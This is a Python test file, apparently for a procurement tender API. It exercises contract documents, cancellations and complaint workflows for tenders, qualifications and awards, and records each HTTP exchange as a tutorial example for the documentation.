response = self.app.post('/tenders/{}/contracts/{}/documents?acc_token={}'.format(
self.tender_id, self.contract_id, owner_token), upload_files=[('file', 'contract_first_document.doc', 'content')])
self.assertEqual(response.status, '201 Created')
with open('docs/source/tutorial/tender-contract-get-documents.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/contracts/{}/documents'.format(
self.tender_id, self.contract_id))
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/tender-contract-upload-second-document.http', 'w') as self.app.file_obj:
response = self.app.post('/tenders/{}/contracts/{}/documents?acc_token={}'.format(
self.tender_id, self.contract_id, owner_token), upload_files=[('file', 'contract_second_document.doc', 'content')])
self.assertEqual(response.status, '201 Created')
self.document_id = response.json['data']['id']
with open('docs/source/tutorial/tender-contract-patch-document.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/contracts/{}/documents/{}?acc_token={}'.format(
self.tender_id, self.contract_id, self.document_id, owner_token), {'data': {"language": 'en', 'title_en': 'Title of Document', 'description_en': 'Description of Document'}} )
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/tender-contract-get-documents-again.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/contracts/{}/documents'.format(
self.tender_id, self.contract_id))
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/tender-contract-get.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/contracts/{}?acc_token={}'.format(
self.tender_id, self.contract_id, owner_token))
self.assertEqual(response.status, '200 OK')
#### Preparing the cancellation request
#
with open('docs/source/tutorial/prepare-cancellation.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/cancellations?acc_token={}'.format(
self.tender_id, owner_token), cancellation)
self.assertEqual(response.status, '201 Created')
cancellation_id = response.json['data']['id']
with open('docs/source/tutorial/update-cancellation-reasonType.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/cancellations/{}?acc_token={}'.format(
self.tender_id, cancellation_id, owner_token), {"data":{'reasonType': 'unsuccessful'}})
self.assertEqual(response.status, '200 OK')
#### Filling cancellation with protocol and supplementary documentation
#
with open('docs/source/tutorial/upload-cancellation-doc.http', 'w') as self.app.file_obj:
response = self.app.post('/tenders/{}/cancellations/{}/documents?acc_token={}'.format(
self.tender_id, cancellation_id, owner_token), upload_files=[('file', u'Notice.pdf', 'content')])
cancellation_doc_id = response.json['data']['id']
self.assertEqual(response.status, '201 Created')
with open('docs/source/tutorial/patch-cancellation.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/cancellations/{}/documents/{}?acc_token={}'.format(
self.tender_id, cancellation_id, cancellation_doc_id, owner_token), {'data': {"description": 'Changed description'}} )
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/update-cancellation-doc.http', 'w') as self.app.file_obj:
response = self.app.put('/tenders/{}/cancellations/{}/documents/{}?acc_token={}'.format(
self.tender_id, cancellation_id, cancellation_doc_id, owner_token), upload_files=[('file', 'Notice-2.pdf', 'content2')])
self.assertEqual(response.status, '200 OK')
#### Activating the request and cancelling tender
#
with open('docs/source/tutorial/active-cancellation.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/cancellations/{}?acc_token={}'.format(
self.tender_id, cancellation_id, owner_token), {"data":{"status":"active"}})
self.assertEqual(response.status, '200 OK')
@unittest.skip("complaitns not implemented")
def test_complaints(self):
response = self.app.post_json('/tenders?opt_pretty=1', {"data": test_tender_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
owner_token = response.json['access']['token']
self.tender_id = tender['id']
with open('docs/source/tutorial/complaint-submission.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/complaints'.format(self.tender_id), complaint)
self.assertEqual(response.status, '201 Created')
complaint1_token = response.json['access']['token']
complaint1_id = response.json['data']['id']
with open('docs/source/tutorial/complaint-submission-upload.http', 'w') as self.app.file_obj:
response = self.app.post('/tenders/{}/complaints/{}/documents?acc_token={}'.format(self.tender_id, complaint1_id, complaint1_token),
upload_files=[('file', u'Complaint_Attachement.pdf', 'content')])
self.assertEqual(response.status, '201 Created')
with open('docs/source/tutorial/complaint-claim.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint1_id, complaint1_token), {"data": {"status": "claim"}})
self.assertEqual(response.status, '200 OK')
claim = {'data': complaint['data'].copy()}
claim['data']['status'] = 'claim'
with open('docs/source/tutorial/complaint-submission-claim.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/complaints'.format(self.tender_id), claim)
self.assertEqual(response.status, '201 Created')
complaint2_token = response.json['access']['token']
complaint2_id = response.json['data']['id']
complaint_data = {'data': complaint['data'].copy()}
complaint_data['data']['status'] = 'pending'
with open('docs/source/tutorial/complaint-submission-complaint.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/complaints'.format(self.tender_id), complaint_data)
self.assertEqual(response.status, '201 Created')
complaint3_id = response.json['data']['id']
complaint3_token = response.json['access']['token']
response = self.app.post_json('/tenders/{}/complaints'.format(self.tender_id), claim)
self.assertEqual(response.status, '201 Created')
complaint4_id = response.json['data']['id']
complaint4_token = response.json['access']['token']
with open('docs/source/tutorial/complaint-complaint.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint1_id, complaint1_token), {"data": {"status": "pending"}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/complaint-answer.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint2_id, owner_token), {"data": {
"status": "answered",
"resolutionType": "resolved",
"resolution": "Виправлено неконкурентні умови"
}})
self.assertEqual(response.status, '200 OK')
response = self.app.patch_json('/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint4_id, owner_token), {"data": {
"status": "answered",
"resolutionType": "invalid",
"resolution": "Вимога не відповідає предмету закупівлі"
}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/complaint-satisfy.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint2_id, complaint2_token), {"data": {
"satisfied": True,
"status": "resolved"
}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/complaint-escalate.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint4_id, complaint4_token), {"data": {
"satisfied": False,
"status": "pending"
}})
self.assertEqual(response.status, '200 OK')
response = self.app.post_json('/tenders/{}/complaints'.format(self.tender_id), complaint_data)
self.assertEqual(response.status, '201 Created')
complaint5_id = response.json['data']['id']
complaint5_token = response.json['access']['token']
response = self.app.post_json('/tenders/{}/complaints'.format(self.tender_id), complaint_data)
self.assertEqual(response.status, '201 Created')
complaint6_id = response.json['data']['id']
complaint6_token = response.json['access']['token']
self.app.authorization = ('Basic', ('reviewer', ''))
with open('docs/source/tutorial/complaint-reject.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/complaints/{}'.format(self.tender_id, complaint4_id), {"data": {
"status": "invalid"
}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/complaint-accept.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/complaints/{}'.format(self.tender_id, complaint1_id), {"data": {
"status": "accepted"
}})
self.assertEqual(response.status, '200 OK')
response = self.app.patch_json('/tenders/{}/complaints/{}'.format(self.tender_id, complaint3_id), {"data": {
"status": "accepted"
}})
self.assertEqual(response.status, '200 OK')
response = self.app.patch_json('/tenders/{}/complaints/{}'.format(self.tender_id, complaint5_id), {"data": {
"status": "accepted"
}})
self.assertEqual(response.status, '200 OK')
response = self.app.patch_json('/tenders/{}/complaints/{}'.format(self.tender_id, complaint6_id), {"data": {
"status": "accepted"
}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/complaint-resolution-upload.http', 'w') as self.app.file_obj:
response = self.app.post('/tenders/{}/complaints/{}/documents'.format(self.tender_id, complaint1_id),
upload_files=[('file', u'ComplaintResolution.pdf', 'content')])
self.assertEqual(response.status, '201 Created')
with open('docs/source/tutorial/complaint-resolve.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/complaints/{}'.format(self.tender_id, complaint1_id), {"data": {
"status": "satisfied"
}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/complaint-decline.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/complaints/{}'.format(self.tender_id, complaint3_id), {"data": {
"status": "declined"
}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/complaint-accepted-stopped.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/complaints/{}'.format(self.tender_id, complaint5_id), {"data": {
"decision": "Тендер скасовується замовником",
"status": "stopped"
}})
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('broker', ''))
with open('docs/source/tutorial/complaint-resolved.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint1_id, owner_token), {"data": {
"tendererAction": "Умови виправлено",
"status": "resolved"
}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/complaint-accepted-stopping.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint6_id, complaint6_token), {"data": {
"cancellationReason": "Тендер скасовується замовником",
"status": "stopping"
}})
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('reviewer', ''))
with open('docs/source/tutorial/complaint-stopping-stopped.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/complaints/{}'.format(self.tender_id, complaint6_id), {"data": {
"decision": "Тендер скасовується замовником",
"status": "stopped"
}})
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/complaints'.format(self.tender_id), complaint)
self.assertEqual(response.status, '201 Created')
complaint7_id = response.json['data']['id']
complaint7_token = response.json['access']['token']
with open('docs/source/tutorial/complaint-cancel.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint7_id, complaint7_token), {"data": {
"cancellationReason": "Умови виправлено",
"status": "cancelled"
}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/complaints-list.http', 'w') as self.app.file_obj:
self.app.authorization = None
response = self.app.get('/tenders/{}/complaints'.format(self.tender_id))
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/complaint.http', 'w') as self.app.file_obj:
self.app.authorization = None
response = self.app.get('/tenders/{}/complaints/{}'.format(self.tender_id, complaint1_id))
self.assertEqual(response.status, '200 OK')
def test_qualification_complaints(self):
response = self.app.post_json('/tenders?opt_pretty=1', {"data": test_tender_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
owner_token = response.json['access']['token']
self.tender_id = tender['id']
response = self.app.post_json('/tenders/{}/bids'.format(self.tender_id), bid)
bid_id = response.json['data']['id']
bid_token = response.json['access']['token']
response = self.app.patch_json('/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token), {"data": {"status": "pending"}})
# create second bid
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/bids'.format(self.tender_id), bid2)
# Pre-qualification
self.set_status('active.pre-qualification', {"id": self.tender_id, 'status': 'active.tendering'})
auth = self.app.authorization
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {"data": {"id": self.tender_id}})
self.app.authorization = auth
response = self.app.get('/tenders/{}/qualifications'.format(self.tender_id))
self.assertEqual(response.status, "200 OK")
qualifications = response.json['data']
for qualification in qualifications:
response = self.app.patch_json('/tenders/{}/qualifications/{}?acc_token={}'.format(self.tender_id, qualification['id'], owner_token),
{"data": {"status": "active"}})
self.assertEqual(response.status, "200 OK")
# active.pre-qualification.stand-still
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(self.tender_id, owner_token),
{"data": {"status": "active.pre-qualification.stand-still"}})
self.assertEqual(response.status, "200 OK")
self.assertEqual(response.json['data']['status'], "active.pre-qualification.stand-still")
qualification_id = qualifications[0]['id']
#with open('docs/source/tutorial/qualification-complaint-submission.http', 'w') as self.app.file_obj:
# response = self.app.post_json('/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(self.tender_id, qualification_id, bid_token), complaint)
# self.assertEqual(response.status, '201 Created')
#complaint1_token = response.json['access']['token']
#complaint1_id = response.json['data']['id']
#with open('docs/source/tutorial/qualification-complaint-submission-upload.http', 'w') as self.app.file_obj:
# response = self.app.post('/tenders/{}/qualifications/{}/complaints/{}/documents?acc_token={}'.format(self.tender_id, qualification_id, complaint1_id, complaint1_token),
# upload_files=[('file', u'Complaint_Attachement.pdf', 'content')])
# self.assertEqual(response.status, '201 Created')
#with open('docs/source/tutorial/qualification-complaint-complaint.http', 'w') as self.app.file_obj:
# response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(self.tender_id, qualification_id, complaint1_id, complaint1_token), {"data": {"status": "pending"}})
# self.assertEqual(response.status, '200 OK')
#complaint_data = {'data': complaint['data'].copy()}
#complaint_data['data']['status'] = 'pending'
#with open('docs/source/tutorial/qualification-complaint-submission-complaint.http', 'w') as self.app.file_obj:
# response = self.app.post_json('/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(self.tender_id, qualification_id, bid_token), complaint_data)
# self.assertEqual(response.status, '201 Created')
#complaint2_token = response.json['access']['token']
#complaint2_id = response.json['data']['id']
#response = self.app.post_json('/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(self.tender_id, qualification_id, bid_token), complaint_data)
#self.assertEqual(response.status, '201 Created')
#complaint3_token = response.json['access']['token']
#complaint3_id = response.json['data']['id']
#response = self.app.post_json('/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(self.tender_id, qualification_id, bid_token), complaint_data)
#self.assertEqual(response.status, '201 Created')
#complaint4_token = response.json['access']['token']
#complaint4_id = response.json['data']['id']
#response = self.app.post_json('/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(self.tender_id, qualification_id, bid_token), complaint_data)
#self.assertEqual(response.status, '201 Created')
#complaint5_token = response.json['access']['token']
#complaint5_id = response.json['data']['id']
#claim = {'data': complaint['data'].copy()}
#claim['data']['status'] = 'claim'
#with open('docs/source/tutorial/qualification-complaint-submission-claim.http', 'w') as self.app.file_obj:
# response = self.app.post_json('/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(self.tender_id, qualification_id, bid_token), claim)
# self.assertEqual(response.status, '201 Created')
#complaint6_token = response.json['access']['token']
#complaint6_id = response.json['data']['id']
#with open('docs/source/tutorial/qualification-complaint-answer.http', 'w') as self.app.file_obj:
# response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(self.tender_id, qualification_id, complaint6_id, owner_token), {"data": {
# "status": "answered",
# "resolutionType": "resolved",
# "resolution": "Умови виправлено, вибір переможня буде розгянуто повторно"
# }})
# self.assertEqual(response.status, '200 OK')
#with open('docs/source/tutorial/qualification-complaint-satisfy.http', 'w') as self.app.file_obj:
# response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(self.tender_id, qualification_id, complaint6_id, complaint6_token), {"data": {
# "satisfied": True,
# }})
# self.assertEqual(response.status, '200 OK')
#response = self.app.post_json('/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(self.tender_id, qualification_id, bid_token), claim)
#self.assertEqual(response.status, '201 Created')
#complaint7_token = response.json['access']['token']
#complaint7_id = response.json['data']['id']
#response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(self.tender_id, qualification_id, complaint7_id, owner_token), {"data": {
# "status": "answered",
# "resolutionType": "invalid",
# "resolution": "Вимога не відповідає предмету закупівлі"
#}})
#self.assertEqual(response.status, '200 OK')
#with open('docs/source/tutorial/qualification-complaint-unsatisfy.http', 'w') as self.app.file_obj:
# response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(self.tender_id, qualification_id, complaint7_id, complaint7_token), {"data": {
# "satisfied": False,
# }})
# self.assertEqual(response.status, '200 OK')
#response = self.app.post_json('/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(self.tender_id, qualification_id, bid_token), complaint)
#self.assertEqual(response.status, '201 Created')
#with open('docs/source/tutorial/qualification-complaint-claim.http', 'w') as self.app.file_obj:
# response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(self.tender_id, qualification_id, response.json['data']['id'], response.json['access']['token']), {"data": {
# "status": "claim"
# }})
# self.assertEqual(response.status, '200 OK')
#response = self.app.post_json('/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(self.tender_id, qualification_id, bid_token), complaint)
#self.assertEqual(response.status, '201 Created')
#with open('docs/source/tutorial/qualification-complaint-cancel.http', 'w') as self.app.file_obj:
# response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(self.tender_id, qualification_id, response.json['data']['id'], response.json['access']['token']), {"data": {
# "cancellationReason": "Умови виправлено",
# "status": "cancelled"
# }})
# self.assertEqual(response.status, '200 OK')
#self.app.authorization = ('Basic', ('reviewer', ''))
#with open('docs/source/tutorial/qualification-complaint-reject.http', 'w') as self.app.file_obj:
# response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}'.format(self.tender_id, qualification_id, complaint2_id), {"data": {
# "status": "invalid"
# }})
# self.assertEqual(response.status, '200 OK')
#with open('docs/source/tutorial/qualification-complaint-accept.http', 'w') as self.app.file_obj:
# response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}'.format(self.tender_id, qualification_id, complaint1_id), {"data": {
# "status": "accepted"
# }})
# self.assertEqual(response.status, '200 OK')
#response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}'.format(self.tender_id, qualification_id, complaint3_id), {"data": {
# "status": "accepted"
#}})
#self.assertEqual(response.status, '200 OK')
#response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}'.format(self.tender_id, qualification_id, complaint4_id), {"data": {
# "status": "accepted"
#}})
#self.assertEqual(response.status, '200 OK')
#response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}'.format(self.tender_id, qualification_id, complaint5_id), {"data": {
# "status": "accepted"
#}})
#self.assertEqual(response.status, '200 OK')
#with open('docs/source/tutorial/qualification-complaint-resolution-upload.http', 'w') as self.app.file_obj:
# response = self.app.post('/tenders/{}/qualifications/{}/complaints/{}/documents'.format(self.tender_id, qualification_id, complaint1_id),
# upload_files=[('file', u'ComplaintResolution.pdf', 'content')])
# self.assertEqual(response.status, '201 Created')
#with open('docs/source/tutorial/qualification-complaint-resolve.http', 'w') as self.app.file_obj:
# response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}'.format(self.tender_id, qualification_id, complaint1_id), {"data": {
# "status": "satisfied"
# }})
# self.assertEqual(response.status, '200 OK')
#with open('docs/source/tutorial/qualification-complaint-decline.http', 'w') as self.app.file_obj:
# response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}'.format(self.tender_id, qualification_id, complaint3_id), {"data": {
# "status": "declined"
# }})
# self.assertEqual(response.status, '200 OK')
#with open('docs/source/tutorial/qualification-complaint-accepted-stopped.http', 'w') as self.app.file_obj:
# response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}'.format(self.tender_id, qualification_id, complaint5_id), {"data": {
# "decision": "Тендер скасовується замовником",
# "status": "stopped"
# }})
# self.assertEqual(response.status, '200 OK')
#self.app.authorization = ('Basic', ('broker', ''))
#with open('docs/source/tutorial/qualification-complaint-resolved.http', 'w') as self.app.file_obj:
# response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(self.tender_id, qualification_id, complaint1_id, owner_token), {"data": {
# "tendererAction": "Умови виправлено",
# "status": "resolved"
# }})
# self.assertEqual(response.status, '200 OK')
#with open('docs/source/tutorial/qualification-complaint-accepted-stopping.http', 'w') as self.app.file_obj:
# response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(self.tender_id, qualification_id, complaint4_id, complaint4_token), {"data": {
# "cancellationReason": "Тендер скасовується замовником",
# "status": "stopping"
# }})
# self.assertEqual(response.status, '200 OK')
#self.app.authorization = ('Basic', ('reviewer', ''))
#with open('docs/source/tutorial/qualification-complaint-stopping-stopped.http', 'w') as self.app.file_obj:
# response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}'.format(self.tender_id, qualification_id, complaint4_id), {"data": {
# "decision": "Тендер скасовується замовником",
# "status": "stopped"
# }})
# self.assertEqual(response.status, '200 OK')
#self.app.authorization = None
#with open('docs/source/tutorial/qualification-complaints-list.http', 'w') as self.app.file_obj:
# response = self.app.get('/tenders/{}/qualifications/{}/complaints'.format(self.tender_id, qualification_id))
# self.assertEqual(response.status, '200 OK')
#with open('docs/source/tutorial/qualification-complaint.http', 'w') as self.app.file_obj:
# response = self.app.get('/tenders/{}/qualifications/{}/complaints/{}'.format(self.tender_id, qualification_id, complaint1_id))
# self.assertEqual(response.status, '200 OK')
@unittest.skip("complaints not implemeted")
def test_award_complaints(self):
response = self.app.post_json('/tenders?opt_pretty=1', {"data": test_tender_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
owner_token = response.json['access']['token']
self.tender_id = tender['id']
response = self.app.post_json('/tenders/{}/bids'.format(self.tender_id), bid)
bid_id = response.json['data']['id']
bid_token = response.json['access']['token']
response = self.app.patch_json('/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token), {"data": {"status": "pending"}})
# create second bid
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/bids'.format(self.tender_id), bid2)
# Pre-qualification
self.set_status('active.pre-qualification', {"id": self.tender_id, 'status': 'active.tendering'})
auth = self.app.authorization
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {"data": {"id": self.tender_id}})
self.app.authorization = auth
response = self.app.get('/tenders/{}/qualifications'.format(self.tender_id))
self.assertEqual(response.status, "200 OK")
qualifications = response.json['data']
for qualification in qualifications:
response = self.app.patch_json('/tenders/{}/qualifications/{}?acc_token={}'.format(self.tender_id, qualification['id'], owner_token),
{"data": {"status": "active"}})
self.assertEqual(response.status, "200 OK")
# active.pre-qualification.stand-still
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(self.tender_id, owner_token),
{"data": {"status": "active.pre-qualification.stand-still"}})
self.assertEqual(response.status, "200 OK")
self.assertEqual(response.json['data']['status'], "active.pre-qualification.stand-still")
# switch to active.auction
self.set_status('active.auction')
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get('/tenders/{}/auction'.format(self.tender_id))
auction_bids_data = response.json['data']['bids']
self.app.post_json('/tenders/{}/auction'.format(self.tender_id), {'data': {'bids': auction_bids_data}})
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(self.tender_id, owner_token))
# get pending award
award_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(self.tender_id, award_id, owner_token), {"data": {"status": "active"}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/award-complaint-submission.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/awards/{}/complaints?acc_token={}'.format(self.tender_id, award_id, bid_token), complaint)
self.assertEqual(response.status, '201 Created')
complaint1_token = response.json['access']['token']
complaint1_id = response.json['data']['id']
with open('docs/source/tutorial/award-complaint-submission-upload.http', 'w') as self.app.file_obj:
response = self.app.post('/tenders/{}/awards/{}/complaints/{}/documents?acc_token={}'.format(self.tender_id, award_id, complaint1_id, complaint1_token),
upload_files=[('file', u'Complaint_Attachement.pdf', 'content')])
self.assertEqual(response.status, '201 Created')
with open('docs/source/tutorial/award-complaint-complaint.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(self.tender_id, award_id, complaint1_id, complaint1_token), {"data": {"status": "pending"}})
self.assertEqual(response.status, '200 OK')
complaint_data = {'data': complaint['data'].copy()}
complaint_data['data']['status'] = 'pending'
with open('docs/source/tutorial/award-complaint-submission-complaint.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/awards/{}/complaints?acc_token={}'.format(self.tender_id, award_id, bid_token), complaint_data)
self.assertEqual(response.status, '201 Created')
complaint2_token = response.json['access']['token']
complaint2_id = response.json['data']['id']
response = self.app.post_json('/tenders/{}/awards/{}/complaints?acc_token={}'.format(self.tender_id, award_id, bid_token), complaint_data)
self.assertEqual(response.status, '201 Created')
complaint3_token = response.json['access']['token']
complaint3_id = response.json['data']['id']
response = self.app.post_json('/tenders/{}/awards/{}/complaints?acc_token={}'.format(self.tender_id, award_id, bid_token), complaint_data)
self.assertEqual(response.status, '201 Created')
complaint4_token = response.json['access']['token']
complaint4_id = response.json['data']['id']
response = self.app.post_json('/tenders/{}/awards/{}/complaints?acc_token={}'.format(self.tender_id, award_id, bid_token), complaint_data)
self.assertEqual(response.status, '201 Created')
complaint5_token = response.json['access']['token']
complaint5_id = response.json['data']['id']
claim = {'data': complaint['data'].copy()}
claim['data']['status'] = 'claim'
with open('docs/source/tutorial/award-complaint-submission-claim.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/awards/{}/complaints?acc_token={}'.format(self.tender_id, award_id, bid_token), claim)
self.assertEqual(response.status, '201 Created')
complaint6_token = response.json['access']['token']
complaint6_id = response.json['data']['id']
with open('docs/source/tutorial/award-complaint-answer.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(self.tender_id, award_id, complaint6_id, owner_token), {"data": {
"status": "answered",
"resolutionType": "resolved",
"resolution": "Умови виправлено, вибір переможня буде розгянуто повторно"
}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/award-complaint-satisfy.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(self.tender_id, award_id, complaint6_id, complaint6_token), {"data": {
"satisfied": True,
}})
self.assertEqual(response.status, '200 OK')
response = self.app.post_json('/tenders/{}/awards/{}/complaints?acc_token={}'.format(self.tender_id, award_id, bid_token), claim)
self.assertEqual(response.status, '201 Created')
complaint7_token = response.json['access']['token']
complaint7_id = response.json['data']['id']
response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(self.tender_id, award_id, complaint7_id, owner_token), {"data": {
"status": "answered",
"resolutionType": "invalid",
"resolution": "Вимога не відповідає предмету закупівлі"
}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/award-complaint-unsatisfy.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(self.tender_id, award_id, complaint7_id, complaint7_token), {"data": {
"satisfied": False,
}})
self.assertEqual(response.status, '200 OK')
response = self.app.post_json('/tenders/{}/awards/{}/complaints?acc_token={}'.format(self.tender_id, award_id, bid_token), complaint)
self.assertEqual(response.status, '201 Created')
with open('docs/source/tutorial/award-complaint-claim.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(self.tender_id, award_id, response.json['data']['id'], response.json['access']['token']), {"data": {
"status": "claim"
}})
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('reviewer', ''))
with open('docs/source/tutorial/award-complaint-reject.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint2_id), {"data": {
"status": "invalid"
}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/award-complaint-accept.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint1_id), {"data": {
"status": "accepted"
}})
self.assertEqual(response.status, '200 OK')
response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint3_id), {"data": {
"status": "accepted"
}})
self.assertEqual(response.status, '200 OK')
response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint4_id), {"data": {
"status": "accepted"
}})
self.assertEqual(response.status, '200 OK')
response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint5_id), {"data": {
"status": "accepted"
}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/award-complaint-resolution-upload.http', 'w') as self.app.file_obj:
response = self.app.post('/tenders/{}/awards/{}/complaints/{}/documents'.format(self.tender_id, award_id, complaint1_id),
upload_files=[('file', u'ComplaintResolution.pdf', 'content')])
self.assertEqual(response.status, '201 Created')
with open('docs/source/tutorial/award-complaint-resolve.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint1_id), {"data": {
"status": "satisfied"
}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/award-complaint-decline.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint3_id), {"data": {
"status": "declined"
}})
self.assertEqual(response.status, '200 OK')
